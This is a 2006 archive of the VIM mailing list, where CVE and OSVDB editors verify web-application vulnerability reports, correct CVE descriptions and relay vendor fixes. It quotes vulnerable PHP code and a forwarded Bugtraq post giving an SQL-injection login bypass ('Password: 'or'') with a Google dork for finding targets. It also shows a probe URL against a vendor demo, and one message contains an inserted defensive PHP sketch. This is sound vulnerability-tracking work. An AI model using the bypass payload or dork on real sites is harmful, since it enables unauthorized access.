From jericho at attrition.org Wed Feb 1 05:19:19 2006
From: jericho at attrition.org (security curmudgeon)
Date: Wed, 1 Feb 2006 05:19:19 -0500 (EST)
Subject: [VIM] Source VERIFY of CityPost PHP Upload message parameter XSS
In-Reply-To: <200601272205.k0RM5C2l013702@cairo.mitre.org>
References: <200601272205.k0RM5C2l013702@cairo.mitre.org>

: Ref: SECTRACK:103752

Ref: SECTRACK:1013749

103752 covers the LNKX XSS, which you mention in your next post.

From coley at linus.mitre.org Wed Feb 1 12:24:19 2006
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 1 Feb 2006 12:24:19 -0500 (EST)
Subject: [VIM] Source VERIFY of CityPost PHP Upload message parameter XSS
References: <200601272205.k0RM5C2l013702@cairo.mitre.org>

Hmmmm, our SECTRACKs were messed up for all the CityPost issues, so thanks.

On Wed, 1 Feb 2006, security curmudgeon wrote:

>
> : Ref: SECTRACK:103752
>
> Ref: SECTRACK:1013749
>
> 103752 covers the LNKX XSS, which you mention in your next post.
>

From jericho at attrition.org Wed Feb 1 13:53:14 2006
From: jericho at attrition.org (security curmudgeon)
Date: Wed, 1 Feb 2006 13:53:14 -0500 (EST)
Subject: [VIM] MyBB search.php XSS: "sortordr" or "sorder" ? and vendor ACK
In-Reply-To: <200601311733.k0VHXZmo019687@cairo.mitre.org>
References: <200601311733.k0VHXZmo019687@cairo.mitre.org>

: There also appears to be an SQL-injection related fix in global.php, but
: I'm not sure where it came from - possibly a zero-day exploit.

http://community.mybboard.net/showthread.php?tid=6418

  As some of you saw, when these forums were attacked, there has been the
  discovery of another serious security exploit in MyBB. Soon after the
  boards were exploited, backups of the forum were restored and the
  discovery process began. Due to access logs being completely useless
  (Corrupt), I took to the code and found the potential vulnerability the
  attacker exploited.

Interesting, the MyBB admins disclosed the attacker info:

  Username: dedo (They previously registered here)
  Email Address: o.y.6 at hotmail.com
  IP Address: 88.152.35.15

That email address corresponds with two Bugtraq posts:

http://archives.neohapsis.com/archives/bugtraq/2006-01/0482.html
MyBB 1.2 usercp2.php [ $url ] CrossSiteScripting ( XSS )

http://archives.neohapsis.com/archives/bugtraq/2006-01/0492.html
MyBB 1.2 Local File Incusion

So it seems these may be two of the "several other medium priority vulnerabilities recently discovered".

From coley at mitre.org Thu Feb 2 00:47:46 2006
From: coley at mitre.org (Steven M. Christey)
Date: Thu, 2 Feb 2006 00:47:46 -0500 (EST)
Subject: [VIM] Missed vectors in SPIP SQL injection
Message-ID: <200602020547.k125lkVW005434@cairo.mitre.org>

Based on this disclosure:

http://www.zone-h.org/en/advisories/read/id=8650/

Note how the disclosers also say:

  or with any other variable (id_article, id_breve..) like:

Some VDBs are not mentioning id_breve.

Also, some VDBs missed this:

  The vendor also discovered 2 potential sql injections in the session
  handling and when posting "petitions" (maybe others).

In the interests of full disclosure, an analyst on the CVE content team *also* missed this, but we all make mistakes as is so painfully obvious every time Brian finds a CVE dupe that was my fault ;-)

- Steve

From coley at mitre.org Fri Feb 3 19:48:19 2006
From: coley at mitre.org (Steven M. Christey)
Date: Fri, 3 Feb 2006 19:48:19 -0500 (EST)
Subject: [VIM] Don't expect vendor ACK for NukedWeb
Message-ID: <200602040048.k140mJc2025882@cairo.mitre.org>

From the NukedWeb home page at http://nukedweb.memebot.com/ :

  Not to go into too much detail, but I'm going away to federal prison for
  a few years... Because of this, I won't be here after May 24th 2005.
- Steve

From jericho at attrition.org Fri Feb 3 19:51:19 2006
From: jericho at attrition.org (security curmudgeon)
Date: Fri, 3 Feb 2006 19:51:19 -0500 (EST)
Subject: [VIM] vendor ack/fix: 22793: CRE Loaded files.php Unauthenticated Arbitrary File Upload (fwd)

---------- Forwarded message ----------
From: David M. Graham
To: moderators at osvdb.org
Date: Fri, 03 Feb 2006 11:25:18 -0600
Subject: [OSVDB Mods] [Change Request] 22793: CRE Loaded files.php Unauthenticated Arbitrary File Upload

In regards to this issue, which affects several files in the HTMLarea install in all releases of CRE Loaded 6 prior to 6.2 and including any copy of 6.15 downloaded before January 30th. We have released a patch to address this exploit. It is available at:

http://creloaded.com/Downloads/d_op=getit/lid=172.html

Regards,
David M. Graham, CRE Loaded Project Manager
Chain Reaction Works, Inc

From coley at linus.mitre.org Fri Feb 3 20:33:40 2006
From: coley at linus.mitre.org (Steven M. Christey)
Date: Fri, 3 Feb 2006 20:33:40 -0500 (EST)
Subject: [VIM] RE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0478 (fwd)

An interesting additional bit of information - a claim that the researcher reverse-engineered the patches?

---------- Forwarded message ----------
Date: Fri, 03 Feb 2006 18:59:50 -0600
From: David M. Graham
To: cve at mitre.org
Subject: RE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0478

Your CVE-2006-0478 entry is largely correct. The potential for this exploit was recognized by us approximately a month ago, and we immediately developed a patch. The initial announcement of this risk was made on our website at http://creloaded.com , and it included a patch which will close the vulnerability on all known 6.0x and 6.1x releases.
Subsequently, announcements were made to several security organizations by an individual who included links to a freely available script written to take advantage of the previously publicized issue on unpatched releases. Despite multiple notifications to registered users, distribution of the patch remained low and this remains a serious threat.

We strongly encourage users of CRE Loaded 6.x , osCMax, and other users of osCommerce who have installed HTMLArea based WYSIWYG editors and Admin Access with Levels to modify their installations at the earliest possible moment.

Regards,
David M. Graham, CRE Loaded Project Manager
Chain Reaction Works, Inc.

From coley at linus.mitre.org Fri Feb 3 21:56:45 2006
From: coley at linus.mitre.org (Steven M. Christey)
Date: Fri, 3 Feb 2006 21:56:45 -0500 (EST)
Subject: [VIM] CVE-2006-0484 (under review) - poblem sovled (Info from Vendor) (fwd)

guess vis.pl really *is* part of face control ;-)

---------- Forwarded message ----------
Date: Sat, 4 Feb 2006 04:53:46 +0200
From: support
To: cve at mitre.org
Subject: RE: CVE-2006-0484 (under review) - poblem sovled (Info from Vendor)

RE: CVE-2006-0484 (under review)

  Directory traversal vulnerability in Vis.pl, as part of the FACE CONTROL
  product, allows remote attackers to read arbitrary files via a .. (dot
  dot) in any parameter that opens a file, such as (1) s or (2) p.

The Issue was solved by our program team. All the clients are provided with proper system updates.

Thank you.
Face Control Program Team

From coley at mitre.org Mon Feb 6 17:52:47 2006
From: coley at mitre.org (Steven M. Christey)
Date: Mon, 6 Feb 2006 17:52:47 -0500 (EST)
Subject: [VIM] VERIFY Pluggedout Blog 1.9.9c problem.php XSS
Message-ID: <200602062252.k16Mql0o023966@cairo.mitre.org>

downloaded 1.9.9c as referenced here:

http://www.pluggedout.com/development/forums/viewtopic.php?t=831

I verified the XSS via source inspection. problem.php has:

>switch ($_REQUEST["id"]){
...
> case "1":
...
> print "Problem with Database Result Code
>
> ".$_REQUEST["data"];

No include statements appear before this code, so there is no cleansing going on.

A grep shows that problem.php is only referenced in "Location:" headers from other scripts, one of which is a generic problem reporting routine; so this is probably a case of a "direct request" enabling the XSS, if anyone cares.

- Steve

From coley at mitre.org Mon Feb 6 18:14:25 2006
From: coley at mitre.org (Steven M. Christey)
Date: Mon, 6 Feb 2006 18:14:25 -0500 (EST)
Subject: [VIM] VERIFY Pluggedout Blog 1.9.9c exec.php SQL injection
Message-ID: <200602062314.k16NEP29024134@cairo.mitre.org>

downloaded 1.9.9c as referenced here:

http://www.pluggedout.com/development/forums/viewtopic.php?t=831

I verified the SQL injection via source inspection.

In database.php, $entryid in db_sql_comment_add() is not escaped:

>function db_sql_comment_add($entryid,$name,$email,$url,$comment){
...
> $name = mysql_escape_string(strip_tags($name));
> $email = mysql_escape_string(strip_tags($email));
> $url = mysql_escape_string(strip_tags($url));
> $comment = mysql_escape_string(strip_tags($comment));
...
> $sql = "INSERT INTO ".$db_prefix."comments (nEntryId,cName,cEMail,cURL,cComment,dAdded)"
> ." VALUES (".$entryid.",'".$name."','".$email."','".$url."','".$comment."',now())";

In exec.php:

>function comment_add($entryid,$name="",$email="",$url="",$comment=""){
...
> $sql = db_sql_comment_add($entryid,$name,$email,$url,$comment);

So, if we control the 1st argument to comment_add() we are set. Later in exec.php:

>switch ($_GET["action"]){
> case "comment_add":
> $result = comment_add($_REQUEST["entryid"],$_REQUEST["name"],$_REQUEST["email"],$_REQUEST["url"],$_REQUEST["comment"]);

So we have $_REQUEST["entryid"] added unquoted into a SQL query.

Note: other code in the same file seems to use $_REQUEST["entryid"] as well.
- Steve

From jericho at attrition.org Tue Feb 7 00:57:59 2006
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 7 Feb 2006 00:57:59 -0500 (EST)
Subject: [VIM] jumping the gun?

http://www.secunia.com/advisories/18740/
Release Date: 2006-02-06

Reference: http://users.pandora.be/bratax/advisories/b008.html
Release Date: February 10 2006

From coley at mitre.org Wed Feb 8 20:12:37 2006
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 8 Feb 2006 20:12:37 -0500 (EST)
Subject: [VIM] CVE-2005-4003 - ASPS - description identifies wrong bug type
Message-ID: <200602090112.k191CbpJ025841@cairo.mitre.org>

Regarding CVE-2005-4003. This arose from a r0t blog entry that clearly identified XSS. However, the CVE description says SQL injection. Stupid description templates! ;-)

Some VDBs have mentioned both XSS and SQL injection as vectors. While the issue smells like it could be both (e.g. SQL injection enabling XSS in error messages), it could be that these VDBs mentioned the SQL injection due to CVE's mistaken description. The only original source information I have is XSS.

If anybody has any information on whether the SQL injection issues really exist, let me know. Right now I have a pretty ugly-looking candidate on my hands :)

- Steve

======================================================
Name: CVE-2005-4003
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4003
Reference: MISC:http://pridels.blogspot.com/2005/12/asps-shopping-cart-professional-and.html
Reference: BID:15694
Reference: URL:http://www.securityfocus.com/bid/15694

Multiple SQL injection vulnerabilities in Absolute Shopping Package Solutions (ASPS) Shopping Cart Professional 2.9d and earlier, and Lite 2.1 and earlier, allow remote attackers to execute arbitrary SQL commands via the (1) srch_product_name parameter to adv_search.asp and (2) b_search parameter to bsearch.asp.
NOTE: the original disclosure was specifically only for an XSS issue, but the CVE description was for SQL injection. Since the original disclosure, SQL injection vectors have been reported. This CVE might be REJECTed or significantly altered pending additional information.

From jericho at attrition.org Thu Feb 9 02:40:13 2006
From: jericho at attrition.org (security curmudgeon)
Date: Thu, 9 Feb 2006 02:40:13 -0500 (EST)
Subject: [VIM] 22793: CRE Loaded files.php Unauthenticated Arbitrary File Upload (fwd)

I have updated OSVDB 22793 to reflect all of this.

---------- Forwarded message ----------
From: David M. Graham
To: security curmudgeon
Cc: moderators at osvdb.org
Date: Sat, 04 Feb 2006 10:16:21 -0600
Subject: Re: [OSVDB Mods] [Change Request] 22793: CRE Loaded files.php Unauthenticated Arbitrary File Upload

Brian,

HTMLarea is a product of dynarch.com and interactivetools.com . It is available under a BSD type license and is widely used in Open Source web projects. http://www.dynarch.com/projects/htmlarea/ is the product page, and should give more information.

Various releases of CRE Loaded have used both HTMLArea 1.7 and 2.03. HTMLArea is now nearing release 3.x. with 3.0 rc2 being available at the time of this writing. I do not know if 3.x will address this issue. Generally it appears that security is left to the integrator, and we apparently missed 4 files.

Regards,
David

security curmudgeon wrote:

> : 6.02 Beta , 6.042 (all patch levels), 6.1 , and 6.15 .
> :
> : The forthcoming 6.2 release does not use HTMLarea and does not include
> : this vulnerability.
>
> Excellent, I will mention that 6.2 is a viable upgrade to fix the issue as
> well.
>
> : Further, it is important to note that this issue may affect not only CRE
> : Loaded osCommerce, but any osCommerce variant which uses HTMLArea with
> : or without the Admin Access with Levels contribution.
>
> Is HTMLArea a separate 'product' (freeware maybe?) that is incorporated into
> CRE Loaded? If so, do you have more info on that product, as our listing
> would be changed to reflect that as the vulnerability, and CRE Loaded
> affected.
>
> Brian
>

From jericho at attrition.org Thu Feb 9 02:51:10 2006
From: jericho at attrition.org (security curmudgeon)
Date: Thu, 9 Feb 2006 02:51:10 -0500 (EST)
Subject: [VIM] ASP Survey - confusion and provenance

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-0192

  SQL injection vulnerability in Login_Validate.asp in ASPSurvey 1.10
  allows remote attackers to execute arbitrary SQL commands via the
  Password parameter. NOTE: the provenance of this information is unknown;
  the details are obtained solely from third party information.

So we have Login_Validate.asp via unknown sources, and login.asp from this bugtraq post?

Vendor URL: http://asp.loftin-nc.com/ASPSurvey/
Demo URL: http://asp.loftin-nc.com/ASPSurvey/Demo/Admin/Login.asp

Thoughts?

---------- Forwarded message ----------
From: mfoxhacker at gmail.com
To: bugtraq at securityfocus.com
Date: 4 Feb 2006 13:25:55 -0000
Subject: sql injection in ASP Survey

Hi guys
there is a simple sql injection in web app. (ASP Survey)
by this vuln. you can go into the admin page

Target Page : login.asp
Vendor : ASP Survey
Exploit :
User: admin
Password: 'or'

Hacking:
1. search on google.com as : allinurl:"login.asp" ASPsurvey
and then type the Exploit in correct order... and Enjoy the admin CP.

From coley at linus.mitre.org Thu Feb 9 12:16:48 2006
From: coley at linus.mitre.org (Steven M. Christey)
Date: Thu, 9 Feb 2006 12:16:48 -0500 (EST)
Subject: [VIM] ASP Survey - confusion and provenance

On Thu, 9 Feb 2006, security curmudgeon wrote:

> http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-0192
>
> SQL injection vulnerability in Login_Validate.asp in ASPSurvey 1.10 allows
> remote attackers to execute arbitrary SQL commands via the Password
> parameter.
> NOTE: the provenance of this information is unknown; the
> details are obtained solely from third party information.
>
> So we have Login_Validate.asp via unknown sources, and login.asp from this
> bugtraq post?

Just yesterday, a CVE analyst was analyzing references to add to this. He looked at HTML source of the demo site and saw that login.asp called Login_Validate.asp, so I modified the description accordingly; see below.

- Steve

======================================================
Name: CVE-2006-0192
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0192
Announced: 20060112
Flaw: sql-inject
Reference: BUGTRAQ:20060204 sql injection in ASP Survey
Reference: URL:http://www.securityfocus.com/archive/1/archive/1/423949/100/0/threaded
Reference: FRSIRT:ADV-2006-0164
Reference: URL:http://www.frsirt.com/english/advisories/2006/0164
Reference: OSVDB:22342
Reference: URL:http://www.osvdb.org/22342
Reference: SECUNIA:18422
Reference: URL:http://secunia.com/advisories/18422
Reference: XF:aspsurvey-loginvalidate-sql-injection(24087)
Reference: URL:http://xforce.iss.net/xforce/xfdb/24087

SQL injection vulnerability in Login_Validate.asp in ASPSurvey 1.10 allows remote attackers to execute arbitrary SQL commands via the Password parameter to login.asp.

Analysis:
ACCURACY: Through html source verification [Heinbockel], the login.asp page forms use the Login_Validate.asp script.

From coley at linus.mitre.org Thu Feb 9 23:56:11 2006
From: coley at linus.mitre.org (Steven M. Christey)
Date: Thu, 9 Feb 2006 23:56:11 -0500 (EST)
Subject: [VIM] Vendor ACK for MyQuiz

alex at evuln said vendor fixed, but the acknowledgement was too vague, so I double-checked with the vendor. vendor responded within minutes of my initial request.
- Steve

---------- Forwarded message ----------
Date: Thu, 09 Feb 2006 22:48:20 -0600
From: Dale Ray
To: coley at mitre.org
Subject: Re: Security vulnerability in MyQuiz

To the best of my knowledge YES the issue is fixed. I did this using whitelist data entry testing. If any character that is not valid input is in the URL calling the script the script aborts with an error message.

But - the only way for you to be sure of this is for you to test the script yourself. You should never trust anything you download from the internet.

*********** START QUOTE ***********
> On 2/9/2006 at 11:34 PM coley at mitre.org wrote:

>Somebody claiming to be Steve Christey wrote:
>
>I am a computer security professional for the CVE project, which is
>sponsored by the Department of Homeland Security to assign standard
>identifiers for security vulnerabilities (http://www.us-cert.gov/cve/,
>http://cve.mitre.org/)
>
>Recently, some security vulnerability information about your product
>was posted here:
>
> http://www.evuln.com/vulns/57/summary.html
>
>The researcher says that you fixed the issue in version 2.0, but your
>acknowledgement does not provide enough details to be sure that you are
>fixing the vulnerability identified above.
>
>So... did 2.0 fix the issue above?
>
>Thank you,
>Steve Christey
>Principal Information Security Engineer
>CVE Editor
>The MITRE Corporation
*********** END QUOTE ***********

From coley at mitre.org Fri Feb 10 00:15:32 2006
From: coley at mitre.org (Steven M. Christey)
Date: Fri, 10 Feb 2006 00:15:32 -0500 (EST)
Subject: [VIM] context-dependent attackers
Message-ID: <200602100515.k1A5FW2D006093@cairo.mitre.org>

FYI, in cases like the recent integer overflows in compilers handling the "i>sizeof(int)" expression, you can't know ahead of time whether the affected applications are locally or remotely exploitable. I've started using the phrase "context-dependent" to handle these cases.

Libraries are also likely to have context-dependent attack vectors.
- Steve

From jericho at attrition.org Fri Feb 10 02:59:36 2006
From: jericho at attrition.org (security curmudgeon)
Date: Fri, 10 Feb 2006 02:59:36 -0500 (EST)
Subject: [VIM] vendor ack/fix: Enhanced Simple PHP Gallery index.php dir Variable XSS (fwd)

---------- Forwarded message ----------
From: Rich Pedley
To: moderators at osvdb.org
Date: Tue, 07 Feb 2006 16:17:29 +0000
Subject: [OSVDB Mods] [Change Request] 22201: Enhanced Simple PHP Gallery index.php dir Variable XSS

Hi all,

I have released a new version to hopefully tackle this issue.

http://www.quirm.net/page.php?id=6

Rich Pedley

From jericho at attrition.org Fri Feb 10 21:16:21 2006
From: jericho at attrition.org (security curmudgeon)
Date: Fri, 10 Feb 2006 21:16:21 -0500 (EST)
Subject: [VIM] vendor dispute: 20481: PHP Handicapper process_signup.php serviceid Variable SQL Injection (fwd)

---------- Forwarded message ----------
From: Web Design WRKG
To: moderators at osvdb.org
Date: Fri, 10 Feb 2006 17:21:15 -0800
Subject: [OSVDB Mods] [Change Request] 20481: PHP Handicapper process_signup.php serviceid Variable SQL Injection

I own the software in question and this is 100% false reporting, this is a slander campaign from a customer who had a vulnerability in his SERVER not the software, and was running another script in which emails were bouncing,

From jericho at attrition.org Fri Feb 10 21:26:06 2006
From: jericho at attrition.org (security curmudgeon)
Date: Fri, 10 Feb 2006 21:26:06 -0500 (EST)
Subject: [VIM] 20481: PHP Handicapper process_signup.php serviceid Variable SQL Injection (fwd)

---------- Forwarded message ----------
From: security curmudgeon
To: Web Design WRKG
Cc: moderators at osvdb.org
Date: Fri, 10 Feb 2006 21:25:37 -0500 (EST)
Subject: Re: [OSVDB Mods] [Change Request] 20481: PHP Handicapper process_signup.php serviceid Variable SQL Injection

Hello,

: I own the software in question and this is 100% false reporting, this is
: a slander campaign from a
: customer who had a vulnerability in his SERVER
: not the software, and was running another script in which emails were
: bouncing,

This issue appears to have originally been disclosed to Secunia [1]. They cite "BiPi_HaCk, Nightmare TeAmZ" as the person who shared the information with them, and found the vulnerability. Are you saying that 'BiPi_HaCk' is the customer attempting to slander you?

Since you have a demo available, I went to the following URL to see if the file in question existed:

http://www.phphandicapper.com/demos/1front/source/process_signup.php

This URL yields the following error:

  Warning: mysql_result(): supplied argument is not a valid MySQL result
  resource in /home/hand/public_html/demos/1front/source/process_signup.php
  on line 20
  You have an error in your SQL syntax. Check the manual that corresponds
  to your MySQL server version for the right syntax to use near
  ','paypal')' at line 1

This warning is likely why someone thought the script was vulnerable to SQL injection. The error message is one indication that it may be, but no proof by any means. As you can see though, it also discloses the full path of the installation which is a separate issue.

Brian
OSVDB.org

From coley at linus.mitre.org Fri Feb 10 21:44:07 2006
From: coley at linus.mitre.org (Steven M. Christey)
Date: Fri, 10 Feb 2006 21:44:07 -0500 (EST)
Subject: [VIM] vendor dispute: 20481: PHP Handicapper process_signup.php serviceid Variable SQL Injection (fwd)

*sigh*

It is at least 67% true reporting. Why do we seem to get complaints on Friday? :)

SQL injection - or at least forced invalid SQL - is here, with path disclosure:

http://www.phphandicapper.com/demos/1front/source/process_signup.php?serviceid='

This yields the error:

  Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL
  result resource

And here's an XSS vector as identified in Secunia 17412.

http://www.phphandicapper.com/demos/1front/source/msg.php?msg=

Oh - for those VDBs with provenance problems, here is the original BiPi_Hack advisory:

http://www.zone-h.org/advisories/read/id=8360

NOTE - the original reference implies that the process_signup.php login parameter vector is CRLF injection, *not* XSS.

- Steve

On Fri, 10 Feb 2006, security curmudgeon wrote:

>
>
> ---------- Forwarded message ----------
> From: Web Design WRKG
> To: moderators at osvdb.org
> Date: Fri, 10 Feb 2006 17:21:15 -0800
> Subject: [OSVDB Mods] [Change Request] 20481: PHP Handicapper process_signup.php
> serviceid Variable SQL Injection
>
> I own the software in question and this is 100% false reporting, this is a
> slander campaign from a customer who had a vulnerability in his SERVER not
> the software, and was running another script in which emails were
> bouncing,
>

From jericho at attrition.org Fri Feb 10 22:18:17 2006
From: jericho at attrition.org (security curmudgeon)
Date: Fri, 10 Feb 2006 22:18:17 -0500 (EST)
Subject: [VIM] CVE-2005-4003 - ASPS - description identifies wrong bug type
In-Reply-To: <200602090112.k191CbpJ025841@cairo.mitre.org>
References: <200602090112.k191CbpJ025841@cairo.mitre.org>

: Some VDBs have mentioned both XSS and SQL injection as vectors. While
: the issue smells like it could be both (e.g. SQL injection enabling XSS
: in error messages), it could be that these VDBs mentioned the SQL
: injection due to CVE's mistaken description. The only original source
: information I have is XSS.
:
: ======================================================
: Name: CVE-2005-4003
: Status: Candidate
: URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4003
: Reference: MISC:http://pridels.blogspot.com/2005/12/asps-shopping-cart-professional-and.html
: Reference: BID:15694
: Reference: URL:http://www.securityfocus.com/bid/15694

The blog has no mention of SQL still, and BID covers XSS.
Know off hand which VDBs picked up or reported the SQL issue?

From coley at mitre.org Mon Feb 13 01:47:27 2006
From: coley at mitre.org (Steven M. Christey)
Date: Mon, 13 Feb 2006 01:47:27 -0500 (EST)
Subject: [VIM] "does not do X" versus "does not properly do X"
Message-ID: <200602130647.k1D6lRwS023756@faron.mitre.org>

All,

As developers have attempted to perform input validation, the number of errors in input validation is increasing. The incomplete blacklist problem I wrote about a couple weeks ago was one example.

I think it's useful/important to make distinctions between when someone *tries* to implement a protection scheme, versus when there *is no* protection scheme. CVE description style has evolved slightly because of that.

If a product tries to do X, but fails, then we say it "does not properly" do X.

If a product does not even TRY to do X, then we say it "does not" do X.

Example:

http://lkml.org/lkml/2005/12/23/171

The vendor says "We must check for MAY_SATTR before setting acls, which includes checking for read-only exports: the lower-level setxattr operation that eventually sets the acl cannot check export-level restrictions."

It doesn't say that they check for "MAY_SATTR" in some weird broken way; they simply don't do it. And you can confirm this by looking at their patch.

Therefore the CVE desc for this would say something like "Product does not check for MAY_SATTR..."

===

Now look at this issue:

http://www.kapda.ir/advisory-231.html

The issue is related to a count value for the number of pings to send. The researcher says:

  "the scripts only allows you to send 10 or 4 pings... Maximum for count
  is: 10"

But then the researcher says:

  "You can bypass the ping count restriction by just making the count value
  negative."

So here, the product TRIES to check the number of pings, but it screws up a little bit. So, the CVE desc is "product DOES NOT PROPERLY verify the number of pings..."
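Editor's added sketch of the ping-count case, not part of Steve's message and not the affected script's code: a check that enforces only the upper bound (the "does not properly verify" shape) beside one that verifies the whole range, run over constructed count values. Function names, the constant and the command shape are assumptions; that the count ends up on a shell command line is assumed from the advisory's subject, not confirmed by the page.

```php
<?php
// Editor-added example, not code from the product in the kapda.ir advisory.
// Function names, PING_MAX and the command shape are invented; that the
// count reaches a shell command line is an assumption for this sketch.

const PING_MAX = 10;

// "does not properly verify": only the upper bound is enforced. A negative
// value, or "3abc" truncated by the (int) cast, sails through.
function ping_count_improper($raw): int
{
    $count = (int)$raw;
    if ($count > PING_MAX) {
        $count = PING_MAX;
    }
    return $count;
}

// Proper check: the value must parse as an integer inside [1, PING_MAX];
// anything else is rejected (null) instead of being clamped or coerced.
function ping_count_proper($raw): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null;
    }
    $count = filter_var($raw, FILTER_VALIDATE_INT,
        ["options" => ["min_range" => 1, "max_range" => PING_MAX]]);
    return $count === false ? null : $count;
}

// Where the count becomes part of a command line (assumed here), build it
// only from the validated integer and a shell-quoted host; refuse otherwise.
function ping_command(string $host, $raw_count): ?string
{
    $count = ping_count_proper($raw_count);
    if ($count === null) {
        return null;
    }
    return "ping -c " . $count . " " . escapeshellarg($host);
}

// Constructed values a "count" parameter might carry.
foreach (["4", "10", "11", "-5", "3abc", "0", ""] as $raw) {
    printf("%-7s improper=%-3d proper=%s\n", var_export($raw, true),
        ping_count_improper($raw), var_export(ping_count_proper($raw), true));
}
// Only "4" and "10" pass the proper check; the improper one lets -5 through
// as a negative count and turns "3abc" into 3.
var_dump(ping_command("192.0.2.10", "-5"));   // NULL
var_dump(ping_command("192.0.2.10", "4"));    // string: ping -c 4 '192.0.2.10'
```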
- Steve

From mattmurphy at kc.rr.com Tue Feb 14 00:39:55 2006
From: mattmurphy at kc.rr.com (Matthew Murphy)
Date: Mon, 13 Feb 2006 23:39:55 -0600
Subject: [VIM] [Full-disclosure] Advisory: Internet Explorer Drag and Drop Redeux [CVE-2005-3240] (fwd)
References: <43F126FD.7080505@kc.rr.com> <43F1286E.9030902@kc.rr.com>
Message-ID: <43F16D2B.7090408@kc.rr.com>

security curmudgeon wrote:
> OSVDB 2707 is public now, thanks!
>
> we're still holding OSVDB 536 for you.

My screw-ups on this one (like not sending the *revised* version of the advisory to the lists) have really made things complicated. I'd recommend linking to SecuriTeam rather than my mailing list post (which now contains some known accuracy problems).

That link is: http://www.securiteam.com/windowsntfocus/5MP0B0UHPA.html

It presently contains the broken CVE/Bugtraq links but should be getting an update soon to fix that. Should any *other* issues emerge, that advisory will also be updated. As many things as I f---ed up on this release, I wouldn't be surprised if there are more updates.

Pardon my scatter-brainedness. Lesson learned: don't try to release an advisory when you've been seriously short of sleep.

--
"Social Darwinism: Try to make something idiot-proof, nature will provide you with a better idiot." -- Michael Holstein

From jericho at attrition.org Tue Feb 14 00:39:16 2006
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 14 Feb 2006 00:39:16 -0500 (EST)
Subject: [VIM] Advisory: Internet Explorer Drag and Drop Redeux [CVE-2005-3240] (fwd)
In-Reply-To: <43F16D2B.7090408@kc.rr.com>
References: <43F126FD.7080505@kc.rr.com> <43F1286E.9030902@kc.rr.com> <43F16D2B.7090408@kc.rr.com>

: > OSVDB 2707 is public now, thanks!
: >
: > we're still holding OSVDB 536 for you.
:
: My screw-ups on this one (like not sending the *revised* version of the
: advisory to the lists) have really made things complicated. I'd
: recommend linking to SecuriTeam rather than my mailing list post (which
: now contains some known accuracy problems).
:
: That link is: http://www.securiteam.com/windowsntfocus/5MP0B0UHPA.html

I've added this to OSVDB 2707.

: It presently contains the broken CVE/Bugtraq links but should be getting
: an update soon to fix that. Should any *other* issues emerge, that
: advisory will also be updated.

I will add the bad CVE/BID numbers down the road, but for now leaving them off to avoid confusion.

From coley at linus.mitre.org Tue Feb 14 01:24:56 2006
From: coley at linus.mitre.org (Steven M. Christey)
Date: Tue, 14 Feb 2006 01:24:56 -0500 (EST)
Subject: [VIM] [Full-disclosure] Advisory: Internet Explorer Drag and Drop Redeux [CVE-2005-3240] (fwd)
In-Reply-To: <43F16D2B.7090408@kc.rr.com>
References: <43F126FD.7080505@kc.rr.com> <43F1286E.9030902@kc.rr.com> <43F16D2B.7090408@kc.rr.com>

I'll be fixing up the CVE's and making sure it's on the public site very shortly.
The Omnistar Live issue at CVE-2005-3840 will certainly get some more attention now, though ;-)

- Steve

From jericho at attrition.org Tue Feb 14 18:58:32 2006
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 14 Feb 2006 18:58:32 -0500 (EST)
Subject: [VIM] vendor ack/fix 22243: Modular Merchant Marketplace Shopping Cart category.php cat Variable XSS (fwd)

---------- Forwarded message ----------
From: Sherri Marier
To: moderators at osvdb.org
Date: Tue, 14 Feb 2006 13:25:33 -0800
Subject: [OSVDB Mods] [Change Request] 22243: Modular Merchant Marketplace Shopping Cart category.php cat Variable XSS

Hello,

Please note that as of 02/03/06 this issue has been corrected with update version 2.017. Please update your database with this new information in the solution section accordingly. The forum post with detailed information can be found below.

http://www.modularmerchant.com/forums/viewtopic.php?t=46

Sherri Marier
www.ModularMerchant.com

From jericho at attrition.org Wed Feb 15 08:48:38 2006
From: jericho at attrition.org (security curmudgeon)
Date: Wed, 15 Feb 2006 08:48:38 -0500 (EST)
Subject: [VIM] EV0074 BirthSys 3.1 SQL injection (fwd)

One of our manglers discovered a small error in a recent evuln.com disclosure. Apparently 'date.php' is really 'date.php3'. I encouraged him to contact evuln.com with this information.

---------- Forwarded message ----------
From: Josh Zlatin
To: support at evuln.com
Date: Wed, 15 Feb 2006 08:50:10 -0500 (EST)
Subject: EV0074 BirthSys 3.1 SQL injection

I wanted to clarify the SQL injection in the data.php3 file in BirthSys 3.1 that you reported.
I was unable to recreate the SQL injection via either the 'date' or 'month' variables as both of those are set in the date.php3 code itself:

Quoted from BirthSys data.php3:

$date = date( "d" );
$month=("$monthName[$currentMonth]");

The only SQL query in that script is:

$result = mysql_query("SELECT * FROM birthsys WHERE month= $month AND day= $date");

so am I missing something or is this a mistake?

Thanks,

--
- Josh

From coley at mitre.org Wed Feb 15 23:50:37 2006
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 15 Feb 2006 23:50:37 -0500 (EST)
Subject: [VIM] DF MSAnalysis SQL injection in CPG-Nuke Dragonfly CMS 9.0.6.1
Message-ID: <200602160450.k1G4ob0P014020@faron.mitre.org>

While researching the linking.php Dragonfly issue, I fell down the rabbit hole and found this gem of a forum post:

http://dragonflycms.org/Forums/viewtopic/t=14751.html

It deals with a victim of a hack attempt (previously not public?), with lots of error messages. Besides getting into the details of the linking.php issue, an SQL injection problem also appears to exist in a module called "DF MSAnalysis" which is some port of a product called "MSAnalysis", but for Dragonfly products. This appears to be a third party module, not something maintained by CPG-Nuke. URL is http://www.musox.com/index.php

This is a nice example for how XSS manipulations can expose SQL injection issues. (I'm calling it SQL injection but if someone thinks it's just path disclosure and no more, definitely let me know :)

